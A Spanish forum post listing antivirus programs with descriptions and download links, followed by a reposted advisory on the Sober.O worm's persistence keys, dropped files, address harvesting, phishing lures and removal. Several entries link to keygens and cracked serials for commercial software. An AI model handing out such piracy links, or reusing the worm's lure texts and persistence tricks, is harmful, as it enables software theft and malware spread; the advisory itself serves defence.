El programa incluye un amplio abanico de utilidades y funciones para optimizar la seguridad de tu PC y tener siempre el máximo de seguridad posible: vigilancia de todas las fuentes posibles de virus, tecnología de protección integrada para aplicaciones de Office, soporte para un gran número de clientes de correo electrónico, posibilidad de controlar también archivos comprimidos, herramientas mejoradas de gestión y notificación avanzada de amenazas e infecciones, etc.
Kaspersky puede además recuperar datos en ficheros infectados, y cuenta con una base de datos de virus actualizada cada hora. Proporciona no sólo protección en tiempo real, sino también posibilidad de realizar análisis de sistema completos cada cierto tiempo, todo ello al más alto nivel de velocidad y efectividad.

Imagenes:
http://screenshots.softonic.com/s2/40000/40189/1_kaspersky1.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://fastdownload.softonic.com/ourfiles/esales/kav5.0.20_personal_pro_en_trial1m.exe
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://rapidshare.de/files-en/562603/KAV.Personal.KEYS.rar.html

http://www.gifanimados.com/lineas/colores/spark.gif
AntiVir Personal Edition 6.30.00.17
Datos:
• Tamaño: 5,8 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia1.gif
Descripcion:
Ante el creciente número de virus que pueden infectar tu PC y provocar pérdida de datos e incluso obligarte a reinstalar todo el sistema, lo mejor es estar bien protegido.
AntiVir Personal Edition es un completo antivirus capaz de detectar y eliminar más de 50.000 virus, incluyendo los de macro y sector de arranque, y es además muy fácil de usar.
Te ofrece una protección segura y efectiva, vigilando en todo momento tu sistema con un Virus Guard residente que controla los movimientos de archivos, por ejemplo cuando descargas archivos de Internet.
Incluye un asistente que actualiza automáticamente las bases de datos de virus para tener siempre tu protección puesta al día.
Eso sí, no es oro todo lo que reluce, y este programa cojea en algunos aspectos importantes; ofrece falsas alarmas con demasiada frecuencia y presenta una falta de flexibilidad ilógica al configurar las comprobaciones así como también en las
Imagenes:
http://screenshots.softonic.com/s2/18000/18069/1_Capturar.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://www.avup.de/personal/en/avwinsfx.exe

>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<
avast! Virus Cleaner 1.0.207
Datos:
• Tamaño: 373 KB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia1.gif
Descripcion:
Una buena protección ante posibles ataques de virus nunca está de más, así como hacer de vez en cuando un análisis a tu PC para asegurarte que lo tienes "limpio" de toda infección.

Para ello puedes contar con avast! Virus Cleaner, una utilidad de limpieza que eliminará totalmente todos aquellos virus y gusanos que hayan osado entrar en tu sistema y no precisamente con buenas intenciones.

El programa es capaz de detener virus activos en memoria, desinfectar tus ficheros, eliminar virus del Registro de Windows y de los elementos que se ejecutan al inicio de Windows.

Nada más arrancar, avast! Virus Cleaner analiza la memoria, acaba con los procesos de gusanos detectados (en caso de que los encuentre) y los desactiva también en memoria, analiza después el disco duro, elimina los posibles ficheros infectados y, si es necesario, te pedirá reiniciar.

El programa está preparado para acabar con los siguientes virus y gusanos, y sus diversas variantes: Badtrans, Beagle, Blaster, BugBear, Ganda, Klez, MiMail, MyDoom, Nimda, Opas, Scold, Sircam, Sober, Sobig, Swen y Yaha.
Imagenes:
http://screenshots.softonic.com/s2/28000/28168/1_28168.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://files.avast.com/files/eng/aswclnr.exe

http://www.gifanimados.com/lineas/colores/spark.gif
ClamWin Antivirus 0.83
Datos:
• Tamaño: 4,8 MB
• S.O.: Win98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia5.gif
Descripcion:

ClamWin Antivirus es un analizador capaz de detectar virus que hayan contaminado cualquier directorio o fichero de tu sistema. Es de código abierto y utiliza bases de datos que se actualizan frecuentemente a través de Internet.
El programa se integra en el menú contextual del Explorador de Windows para analizar ficheros con mayor comodidad, y añade también un plug-in para el cliente de correo Microsoft Outlook a fin de analizar los ficheros que te envían como adjuntos.
Incluye diversas opciones de configuración como la programación de análisis de sistema periódicos, guardar los informes generados, eliminar o mover a un directorio de cuarentena los ficheros infectados, etc.
Imagenes:
http://screenshots.softonic.com/s2/34000/34056/1_clamwin.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://easynews.dl.sourceforge.net/sourceforge/clamwin/clamwin-0.83-setup.exe

http://www.gifanimados.com/lineas/colores/spark.gif
AVG Anti-Virus System Free Edition 7.3008a468
Datos:
• Tamaño: 10,3 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia1.gif
Descripcion:
Potente antivirus gratuito para estar bien protegido y evitar así infecciones de los numerosos virus que circulan hoy en día por la red y, en caso de ser infectado, actuar contra ellos.

Un detalle positivo y del que no pueden presumir todos los programas antivirus es que AVG permite pausar un escaneo para reanudarlo en otro momento.

También es muy cómodo el modo "Custom test" en el que podrás seleccionar las carpetas que desees comprobar a través de un práctico sistema de checkboxes.


AVG Anti-Virus System Free Edition incluye:

• AVG Resident Protection: monitorización constante del sistema
• AVG Email Scanner: escanea tu correo electrónico
• AVG On-Demand Scanner: analiza lo que desees
• Escaneos preprogramados por fechas u horas
• Actualización gratuita de la base de datos de virus
• Función de actualización automática
• Desinfección automática de archivos infectados
• AVG Virus Vault: sistema para manejar de forma segura ficheros infectados

Todo esto a través de un sistema ágil y sencillo de usar.
Imagenes:
http://screenshots.softonic.com/s2/18000/18522/1_18522.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://free.grisoft.com/softw/70free/setup/avg70free_308a468.exe

http://www.gifanimados.com/lineas/colores/spark.gif
NOD32 Anti-Virus System Personal 2.12.3
Datos:
• Tamaño: 6,3 MB
• S.O.: Win95/98/98SE/ME Y XP/NT/2000/2003
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
NOD32 Anti-Virus System es un antivirus de calidad y eficacia realmente impresionantes, con una certeza prácticamente absoluta de que en cada una de sus versiones detectará cualquier virus conocido y, mediante una heurística compleja, por conocer.

Algunas de sus características son la escasa utilización de recursos del sistema, porcentaje de detección de virus y códigos "maliciosos" muy alto, rapidez sorprendente en las búsquedas, análisis heurístico minucioso, numerosas posibilidades de desinfección sin borrado, opciones de recuperación de daños causados por virus, código de 32 bits, etc.

En conjunto se trata de un antivirus de primera calidad, compitiendo entre los mejores en la mayoría de las facetas de estos indispensables de los usuarios, aunque en la velocidad y la total detección basa toda su potencia, destacando del resto.
Imagenes:
http://screenshots.softonic.com/s2/20000/20392/1_Al-01.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif+http://img59.exs.cx/img59/2038/pillblue2vl.gif
Rasen Publico Este Antivirus En un Post los Envio Para Alla:
http://www.aclantis.com/postt13897.html

http://www.gifanimados.com/lineas/colores/spark.gif
Panda Antivirus Titanium 2005 4.00.01
Datos:
• Tamaño: 25,8 MB
• S.O.: Win98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
Si lo que nos preocupa son los virus y posibles intrusos que puedan aparecer en nuestro ordenador, Panda Antivirus Titanium 2004 con TruPrevent es una solución más que completa que no sólo nos protegerá de cualquier intruso conocido, sino que además, y gracias a su nueva herramienta TruPrevent, nos protegerá también de los intrusos aún desconocidos.
Si ya de por sí Panda Antivirus Platinium es un excelente sistema antivirus, con la adición de TruPrevent se convierte en una barrera realmente difícil de franquear por cualquier intruso malicioso, analizando cualquier actividad fuera de lo normal en nuestro ordenador. Aunque esta tecnología de detección puede usarse de manera independiente a otros antivirus, en conjunción con las herramientas antivirus de Panda es ideal, fusionándose en una única herramienta.
Imagenes:
http://screenshots.softonic.com/s2/36000/36474/1_pandatitaniumtru01.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://fastdownload.softonic.com/ourfiles/esales/T2005shareSoftonicSP.exe
Debido a que no encontre la Serial ( noouedo decir que m la pidan al Privado) por lo quel los envio a este post donde se esta entregando :wink:
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://www.aclantis.com/postt13796.html

http://www.gifanimados.com/lineas/colores/spark.gif
Bueno Con esto TermiNo Pro Ahora por que m duele un poco La Cabesa si alguien quiere Postear Anti-Virus
Que lo HAga = :D
*****No Discutan Cual Es mejor ya uqe si no se llenara el Post De Spam :D****

Ya CHau Saludos

BUENO ACA SIGO CON LA LISTA DE ANTIVIRUS:
>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<
BitDefender Professional Plus 8
Datos:
• Tamaño: 13,8 MB
• S.O.: Win98/98SE/NT/ME/2000/XP/2003
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
http://www.geizhals.at/img/pix/127612.jpg
.
Antivirus completo, eficaz y de fácil uso
Completo antivirus de gran potencia y eficacia que mantendrá tu ordenador a salvo de virus, troyanos, gusanos y otros elementos similares de efectos dañinos.

El programa incluye diversas herramientas para analizar tu ordenador en busca de posibles virus, controlar los ficheros adjuntos que llegan por correo electrónico y los que descargas de páginas web, monitorizador del Registro de Windows e incluso protección en los programas de chat.

También posee un cortafuegos y además bloquea el acceso a páginas cuyo contenido nos resulte no deseado (por ejemplo pornografía o violencia explícita).

Es un programa fácil de usar, con una interfaz muy intuitiva y que se actualiza automáticamente cada 8 horas vía Internet.

Incluye importantes funciones de protección como el control de llamadas para evitar llamadas, producidas por dialers, a números 906.
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://fastdownload2.softonic.com/ourfiles/esales/bitdefender_prof_v8.exe
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://rapidshare.de/files/1204416/bitdefenderclientprofessionalplusv8.0.138keygencor e.zip.html

Nota:***Para que les de una mayor eficacia intalenlo despues d eun formateo(ya que este antivirus por lo que tengo entendido es muy bueno bloqueando el accseso a los Virus :wink:

http://www.gifanimados.com/lineas/colores/spark.gif

Datos:
• Tamaño: 24,0 MB
• S.O.: Win98/98SE/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
Norton AntiVirus es la más novedosa utilidad de Symantec para protegerse contra todo tipo de virus, applets Java, controles ActiveX, y todo tipo de código malicioso detectado.

Como la mayoría de antivirus, Norton AntiVirus te protege mientras navegas por Internet, obtienes información de disquetes o CD, en una red LAN, y comprueba los archivos adjuntos que se reciben por e-mail y suele ser una de las mayores causas de infección actualmente.

Recomendamos que, siempre que vayas a probar un antivirus, desactives tu otro antivirus. Es muy importante no ejecutar dos programas antivirus simultáneamente ya que pueden producir conflictos serios en el sistema.
Imagenes:
http://screenshots.softonic.com/s2/21000/21972/1_norton01.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://cdrom.digitalriver.com/pub/symantec/2005/NV11ESD.exe
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://s1.ultrashare.net/hosting/dl/f372a0d7fdfceb6a/
**nota:Para usar el KEY gen visiten este TuToRiAl (http://www.aclantis.com/postt13015.htmlurl)** Creado por Redferne


http://www.gifanimados.com/lineas/colores/spark.gif
Virus Chaser 5.0

Datos:
• Tamaño: 3,9 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
Virus Chaser es un potente antivirus que ofrece protección total contra todo tipo de virus.

Dispone de un potente motor de análisis, desarrollado nacido de la afiliación con los creadores del motor de DrWeb, capaz de encontrar y eliminar todos los virus conocidos y además es capaz de reconocer virus y variantes aún no descubiertas.

Ofrece monitorización completa de tu sistema, análisis de memoria, autorizaciones automáticas, análisis de archivos comprimidos (ZIP, ARJ, RAR, CAB,...) y archivos de instalación, análisis del correo electrónico, etc. Además es capaz de auto-inmunizarse, protegiéndose así de virus que inutilizan los archivos del propio antivirus.
Imagenes:
http://screenshots.softonic.com/s2/29000/29291/1_29291.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://www.viruschaser.com/Kor/download/Demo/setup.exe
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://rapidshare.de/files/1527592/Virus_Chaser.txt.html/
**NOta:Lo eh probado por que muchos me decian que era bueno y adivinene me detecto tres Adwares en SISTEM32..y desia que eran incurables por los que lo elimina(si quieren probarlo..lo recomiendo aunque ocupa unos cuantos recursos cuando analiza)**

http://www.gifanimados.com/lineas/colores/spark.gif
Solo Antivirus
Datos:
• Tamaño: 1,7 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
Solo Antivirus te protege de virus, troyanos, gusanos, scripts e infecciones de sector de arranque, tabla de particiones y macros, siempre incluyendo los elementos más recientes gracias a su utilidad de actualización por Internet.
Su herramienta de monitorización vela por la integridad del Registro de Windows y ficheros importantes tales como win.ini y system.ini. Además, controla en tiempo real todos los ficheros que se ejecutan, se bajan de Internet o se reciben vía e-mail, y permite realizar análisis de sistema según un horario establecido.
Imagenes:
http://screenshots.softonic.com/s2/27000/27518/1_27518.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://www.antivirus-download.com/downloads/evaluate/TrySolo.exe
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://rapidshare.de/files/1527618/Solo_Antivirus.txt.html

http://www.gifanimados.com/lineas/colores/spark.gif
RAV AntiVirus Desktop 8.6.104
Datos:
• Tamaño: 12,1 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
RAV AntiVirus Desktop es un programa de antivirus capaz de detectar y limpiar muchos tipos de virus, como los polimórficos, los virus de macro y los virus de Java.
Incluye rutinas de limpieza para todos los virus nuevos que se encuentran y que se notifican a través de IRC a los autores de programas antivirus.
Imagenes:
http://screenshots.softonic.com/s2/7000/7139/1_7139.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
ftp://ftp1.ravantivirus.com/pub/rav/desktop/win32/ravdsk/8.x/rav8win32eng.exe
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://rapidshare.de/files/1527528/ravantivirusdesktopv8.6.104keygencore.zip.html

http://www.gifanimados.com/lineas/colores/spark.gif
Norman Virus Control for Windows
Datos:
• Tamaño: 12,0 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
• http://www.softonic.com/img/iconos/icon_licencia2.gif
Descripcion:
Potente antivirus con multitud de funciones, todas las que se le pueden pedir a un antivirus y más, y muy configurable.
Detecta virus conocidos y por conocer (haciendo uso de la heurística) y también comprueba la integridad del archivo, anunciando si éste se encuentra dañado.

La mayoría de opciones de configuración, una cantidad bastante considerable, son realmente para conseguir la protección antivirus a tu medida, sean cuáles sean tus necesidades.

Resulta especialmente flexible y específica la configuración para "Internet", actuando, protegiendo y configurando de forma individual cada uno de los aspectos. Ofrece por ejemplo protección para correo SMTP, IMAP y POP3, además de servicios de News a través de NNTP.
Imagenes:
http://screenshots.softonic.com/s2/24000/24296/1_24296.jpg
Descarga:
http://img142.exs.cx/img142/3377/software9fe.gif
http://download.norman.no/nvc5/NVC58_R5ESP.EXE
http://img59.exs.cx/img59/2038/pillblue2vl.gif
http://rapidshare.de/files/1527680/normanviruscontrolv5.80r1dutchkeygenblizzard.zip.h tml

Bueno en Eso termina mi LIsta de ANTIVIRUS..Si alguien quiere aportar mas...QUe APORTE NO MAS ***PERO SI ES SHAREWARE QUE PORFAVOR VENGA CON SERIAL 8KEYGEN LOQ UE SEA PA QUE FUNCIONE)

CHAU SALUDOS

Sober.V es un nuevo gusano que está infectando numerosos ordenadores, sobre todo de Estados Unidos, Alemania, Austria y Suiza. Simula proceder de la organización futbolística FIFA y dice a los que lo reciben que son los ganadores de entradas gratis para la Copa del Mundo del 2006 en Alemania.
Este gusano se distribuye a sí mismo de forma automática, cogiendo las direcciones a las que se envía de los ordenadores afectados. El mensaje que lo contiene está escrito en alemán o inglés, y tiene asuntos variados, como WM Ticket Verlosung o Your email was blocked

cuidense

8) Sweet

Virus más extendidos: últimas 24h

Nombre Peligrosidad Infecciones
Netsky.P 4 - Alta 240.673
(32.7 %)
Zafi.D 4 - Alta 184.609
(25.1 %)
Sober.O 4 - Alta 138.632
(18.8 %)
Netsky.Q 4 - Alta 26.513
(3.6 %)
Netsky.D 3 - Media 25.811
(3.5 %)
Muestra:9.779.155 - Detecciones:735.927 (7.5 %)



Sober.O (Peligrosidad: 4 - Alta)

Gusano cuya propagación se realiza mediante el envío masivo de mensajes a direcciones capturadas de ficheros ubicados en el equipo infectado.
Utiliza su própio motor SMTP, lo que hace independiente su funcionamiento del cliente de correo instalado en el equipo.
El mensaje está escrito en inglés o en alemán y el gusano llega como fichero anexo en un archivo comprimido de extensión '.zip' y con un tamaño de 53554 bytes.
Solución
Si utiliza Windows Me o XP, y sabe cuándo se produjo la infección, puede usar la característica de Restauración del Sistema para eliminar el virus volviendo a un punto de restauración anterior a la infección. (Tenga en cuenta que se desharán los cambios de configuración de Windows y se eliminarán todos los archivos ejecutables que haya creado o descargado desde la fecha del punto de restauración)

Si esto no es posible o no funciona es recomendable desactivar temporalmente la Restauración del Sistema antes de eliminar el virus por otros medios, ya que podría haberse creado una copia de seguridad del virus. Si necesita ayuda vea desactivar la Restauración del Sistema en Windows Me y desactivar la Restauración del Sistema en Windows XP.

Con un antivirus actualizado, localice todas las copias del virus en el disco duro de su PC. Si no dispone de antivirus, visite nuestra página de Antivirus gratuitos. Repare o borre el fichero infectado.
Si el antivirus no puede reparar la infección o borrar los ficheros, puede ser debido a que el fichero está en uso por estar el virus en ejecución (residente en memoria).
Nota: A Menudo los antivirus informan de que 'no puede reparar un fichero' en el caso de gusanos o troyanos debido a que no hay nada que reparar, simplemente hay que borrar el fichero.

En el caso de que no se pueda eliminar el fichero del virus, debe terminar manualmente el proceso en ejecución del virus. Abra el Administrador de tareas (presione Control+Mayúsculas+Esc). En Windows 98/Me seleccione el nombre del proceso y deténgalo. En Windows 2000/XP, en la pestaña 'Procesos' haga clic derecho en el proceso y seleccione 'Terminar Proceso'. A continuación vuelva a intentar el borrado o reparación del fichero.

A continuación hay que editar el registro para deshacer los cambios realizados por el virus. Si necesita información sobre cómo editar el registro puede ver esta guía de edición del registro o este vídeo de ayuda que ilustra el proceso. Sea extremadamente cuidadoso al manipular el registro. Si modifica ciertas claves de manera incorrecta puede dejar el sistema inutilizable.

Para evitar que el gusano sea ejecutado automáticamente cada vez que el sistema es reiniciado, elimine de las siguientes claves del registro de Windows, los valores indicados:

Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
Valor: " WinStart" = "%Windir%\Connection Wizard\Status\services.exe"

Clave: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
Valor: "_WinStart" = "%Windir%\Connection Wizard\Status\services.exe"

Restaure las siguientes entradas del registro:

Reinicie su ordenador y explore todo el disco duro con un antivirus para asegurarse de la eliminación del virus. Si desactivó la restauración del sistema, recuerde volver a activarla.

También puede utilizar para la reparación de los daños producidos por acción de Sober.O, las siguientes herramientas específicas ofrecidas por algunos fabricantes de antivirus:

http://alerta-antivirus.red.es/imagenes/symant_mp.png Symantec (http://securityresponse.symantec.com/avcenter/venc/data/w32.sober.removal.tool.html) - descargar el fichero FxSobr.exe.
http://alerta-antivirus.red.es/imagenes/mcafee_mp.png McAfee (http://vil.nai.com/vil/stinger/) - descargar el fichero Stinger.exe.
http://alerta-antivirus.red.es/imagenes/nod32_mp.png Nod32 (http://www.nod32-es.com/home/home.htm) - descargar el fichero SBRFIX.ZIP.
http://alerta-antivirus.red.es/imagenes/trend_mp.png Trend Micro (http://es.trendmicro-europe.com/enterprise/support/clean_tools_new.php) - descargar el fichero sysclean.com.
http://alerta-antivirus.red.es/imagenes/panda_mp.png Panda Software (http://www.pandasoftware.es/descargas/utilidades/) - pulsar sobre Sober.V y registrarse para la descarga (si no lo ha hecho antes).
http://alerta-antivirus.red.es/imagenes/bitdefender_mp.png BitDefender (http://www.bitdefender-es.com/html/free_tools.php#) - descargar herramienta en la misma linea que se encuentra Sober.N. -->


Datos Técnicos
Peligrosidad: 4 - Alta Difusión: Alta Fecha de Alta:03-05-2005
Última Actualización:05-05-2005
Daño: Bajo
[Explicación de los criterios] Dispersibilidad: Alto
Nombre completo: Worm.W32/Sober.O@MM
Tipo: [Worm] - Programa que se replica copiándose entero (sin infectar otros ficheros) en la máquina infectada, y a través de redes de ordenadores
Plataforma: [W32] - Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003
Mecanismo principal de difusión: [MM] - Virus que envía masivamente mensajes de correo electrónico, habitualmente a todas las direcciones capturadas en el sistema infectado.
Tamaño (bytes): 53554
Tamaño comprimido (bytes): 53728
Alias:W32.Sober.O@mm (Symantec), WORM_SOBER.S (Trend Micro), W32/Sober.V.worm (Panda Software), Win32.Sober.N (Computer Associates), W32/Sober.p@MM (McAfee), W32/Sober-N (Sophos), Sober.O@mm (Norman), Sober.P (F-Secure), Email-Worm.Win32.Sober.p (Kaspersky (viruslist.com)), Win32/Sober.O (ClamAV), Worm.Sober.P (ClamAV), Win32.Sober.O@mm (Bit Defender), Win32/Sober.O (ESET (NOD32)), Worm/Sober.P (Otros), Win32/Sober.O (Enciclopedia Virus)
Detalles
Cuando Worm.W32/Sober.O@MM es ejecutado, realiza las siguientes acciones:

1. Muestra el siguiente mensaje:

http://alerta-antivirus.red.es/imagenes/virus/sobero.gif


2. Crea los siguientes ficheros:
%Windir%\Connection Wizard\Status\csrss.exe
%Windir%\Connection Wizard\Status\packed1.sbr
%Windir%\Connection Wizard\Status\packed2.sbr
%Windir%\Connection Wizard\Status\packed3.sbr
%Windir%\Connection Wizard\Status\services.exe
%Windir%\Connection Wizard\Status\smss.exe
%Windir%\Connection Wizard\Status\sacri1.ggg
%Windir%\Connection Wizard\Status\sacri2.ggg
%Windir%\Connection Wizard\Status\sacri3.ggg
%Windir%\Connection Wizard\Status\voner1.von
%Windir%\Connection Wizard\Status\voner2.von
%Windir%\Connection Wizard\Status\voner3.von
%Windir%\Connection Wizard\Status\sysonce.tst
%Windir%\Connection Wizard\Status\fastso.ber
%System%\adcmmmmq.hjg
%System%\langeinf.lin
%System%\nonrunso.ber
%System%\seppelmx.smx
%System%\xcvfpokd.tqa

Notas:
%Windir% es una variable que hace referencia al directorio de instalación de Windows.
Por defecto es C:\Windows (Windows 95/98/Me/XP) o C:\Winnt (Windows NT/2000).
%System% es una variable que hace referencia al directorio del sistema de Windows.
Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

Los ficheros sacri1.ggg, sacri2.ggg, sacri3.ggg, voner1.von, voner2.von, voner3.von, sysonce.tst, fastso.ber, adcmmmmq.hjg, langeinf.lin, nonrunso.ber, seppelmx.smx, xcvfpokd.tqa no poseen contenido malicioso.

3. Para ejecutarse automáticamente cada vez que el sistema es reiniciado, añade los valores indicados a las siguientes claves del registro de Windows:

Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
Valor: " WinStart" = "%Windir%\Connection Wizard\Status\services.exe"

Clave: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
Valor: "_WinStart" = "%Windir%\Connection Wizard\Status\services.exe"

4. Comprueba la disponibilidad de una conexión a red, contactando con un servidor NTP a través del puerto 37, o conectándose a alguno de los siguientes dominios:
microsoft.com
bigfoot.com
yahoo.com
t-online.de
google.com
hotmail.com

5. Obtiene direcciones electrónicas contenidas en ficheros de las siguientes extensiones:
.abc
.abd
.abx
.adb
.ade
.adp
.adr
.asp
.bak
.bas
.cfg
.cgi
.cls
.cms
.csv
.ctl
.dbx
.dhtm
.doc
.dsp
.dsw
.eml
.fdb
.frm
.hlp
.imb
.imh
.imh
.imm
.inbox
.ini
.jsp
.ldb
.ldif
.log
.mbx
.mda
.mdb
.mde
.mdw
.mdx
.mht
.mmf
.msg
.nab
.nch
.nfo
.nsf
.nws
.ods
.oft
.php
.phtm
.pl
.pmr
.pp
.ppt
.pst
.rtf
.shtml
.slk
.sln
.stm
.tbb
.txt
.uin
.vap
.vbs
.vcf
.wab
.wsh
.xhtml
.xls
.xml

El gusano evita enviarse a aquellas direcciones electrónicas que contengan alguna de las siguientes cadenas de texo:
-dav
.dial.
.kundenserver.
.ppp.
.qmail@
.sul.t-
@arin
@avp
@ca.
@example.
@foo.
@from.
@gmetref
@iana
@ikarus.
@kaspers
@messagelab
@nai.
@panda
@smtp.
@sophos
@www
abuse
announce
antivir
anyone
anywhere
bellcore.
bitdefender
clock
detection
domain.
emsisoft
ewido.
free-av
freeav
ftp.
gold-certs
google
host.
icrosoft.
ipt.aol
law2
linux
mailer-daemon
mozilla
mustermann@
nlpmail01.
noreply
nothing
ntp-
ntp.
ntp@
office
password
postmas
reciver@
secure
service
smtp-
somebody
someone
spybot
sql.
subscribe
support
t-dialin
t-ipconnect
test@
time
user@
variabel
verizon.
viren
virus
whatever@
whoever@
winrar
winzip
you@
yourname

6. Intenta enviar una copia de sí mismo a las direcciones recopiladas.

El mensaje enviado podría estar escrito tanto en inglés como en alemán, y posee las siguientes características:

Alemán:
Asunto: uno de los siguientes:
Ihr Passwort
Mail-Fehler!
Ihre E-Mail wurde verweigert
Ich bin's, was zum lachen ;)
Glueckwunsch: Ihr WM Ticket
WM Ticket Verlosung
WM-Ticket-Auslosung

Cuerpo del mensaje: uno de los siguientes:
Passwort und Benutzer-Informationen befinden sich in der beigefuegten Anlage.
http:/ /www.[- dominio_aleatorio -]
*-* MailTo: PasswordHelp


Diese E-Mail wurde automatisch erzeugt
Mehr Information finden Sie unter http:/ /www.[- dominio_aleatorio -]
Folgende Fehler sind aufgetreten:
Fehler konnte nicht Explicit ermittelt werden
Aus Datenschutzrechtlichen Gruenden, muss die vollstaendige E-Mail incl. Daten gezippt & angehaengt werden.
Wir bitten Sie, dieses zu beruecksichtigen.
Auto ReMailer#


Nun sieh dir das mal an
Was ein Ferkel ....


Herzlichen Glueckwunsch,
beim Run auf die begehrten Tickets fr die 64 Spiele der Weltmeisterschaft 2006 in Deutschland sind Sie dabei.Weitere Details ihrer Daten entnehmen Sie bitte dem Anhang.

St. Rainer Gellhaus
--- Pressesprecher Jens Grittner und Gerd Graus
--- FIFA Fussball-Weltmeisterschaft 2006
--- Organisationskomitee Deutschland
--- Tel. 069 / 2006 - 2600
--- Jens.Grittner@ok2006.de
--- Gerd.Graus@ok2006.de


Añade al final del mensaje alguno de los siguientes mensajes elegido aleatoriamente:
Mail-Scanner: Es wurde kein Virus festgestellt
AntiVirus: Kein Virus gefunden
AntiVirus-System: Kein Virus erkannt
WebSite: http:/ /www.[random domain]

Fichero Anexo: uno de los siguientes:
LOL.zip
autoemail-text.zip
_PassWort-Info.zip
Fifa_Info-Text.zip
okTicket-info.zip

Nota: El anexo es un fichero comprimido .zip, que contiene una copia del gusano.
El nombre del fichero contenido por el archivo .zip es alguno de los siguientes:
Winzipped-Text_Data.txt[- muchos espacios en blanco -].pif
Winzipped-Text_Data.txt[- muchos espacios en blanco -].exe.

Inglés:
Asunto: uno de los siguientes:
Re:Your Password
Re:Registration Confirmation
Re:Your email was blocked
Re:mailing error
Re: [- vacío -]

Cuerpo del mensaje: uno de los siguientes:
ok ok ok,,,,, here is it


Account and Password Information are attached!
Visit: http:/ /www.[- dominio_aleatorio -]


This is an automatically generated E-Mail Delivery Status Notification.
Mail-Header, Mail-Body and Error Description are attached


Añade al final del mensaje alguno de los siguientes mensajes elegido aleatoriamente:
Attachment-Scanner: Status OK
AntiVirus: No Virus found
Server-AntiVirus: No Virus (Clean)
http:/ / www.[- dominio_aleatorio -]

Fichero Anexo: uno de los siguientes:
our_secret.zip
mail_info.zip
error-mail_info.zip
account_info.zip
account_info-text.zip

Nota: El anexo es un fichero comprimido .zip, que contiene una copia del gusano.
El nombre del fichero contenido por el archivo .zip es alguno de los siguientes:
Winzipped-Text_Data.txt[- muchos espacios en blanco -].pif
Winzipped-Text_Data.txt[- muchos espacios en blanco -].exe.

7. Elimina, en caso de que existan, los siguientes ficheros:
%ProgramFiles%\Symantec\Liveupdate\a*.exe
%ProgramFiles%\Symantec\Liveupdate\luc*.exe
%ProgramFiles%\Symantec\Liveupdate\ls*.exe
%ProgramFiles%\Symantec\Liveupdate\luu*.exe

Nota: %ProgramFiles% es una variable que hace referencia al directorio de 'Achivos de Programa'.
Por defecto es C:\Archivos de Programa.


8. Sobreescribe el fichero %Program Files%\Symantec\Liveupdate\luall.exe con una copia de sí mismo, en caso de que el archivo antes citado exista en el equipo infectado.
Nombres de Ficheros Adjuntos (virus que llegan por correo)
account_info-text.zip
account_info.zip
error-mail_info.zip
mail_info.zip
our_secret.zip
Asunto del mensaje (virus que llegan por correo)
WM-Ticket-Auslosung
WM Ticket Verlosung
Glueckwunsch: Ihr WM Ticket
Ihre E-Mail wurde verweigert
Mail-Fehler!
Ihr Passwort
Re: - vacio -
Re:mailing error
Re:Your email was blocked
Re:Registration Confirmation
Re:Your Password

Más información acerca de este virus en:

>Symantec ('http://www.symantec.com/avcenter/venc/data/w32.sober.o@mm.html')
Trend Micro ('http://es.trendmicro-europe.com/enterprise/vinfo/encyclopedia.php?LYstr=VMAINDATA&vNav=3&VName=WORM_SOBER.S')
Panda Software ('http://www.pandasoftware.es/virus_info/enciclopedia/verficha.aspx?lst=det&idvirus=72170')
Computer Associates ('http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=42813')
McAfee ('http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=133409')
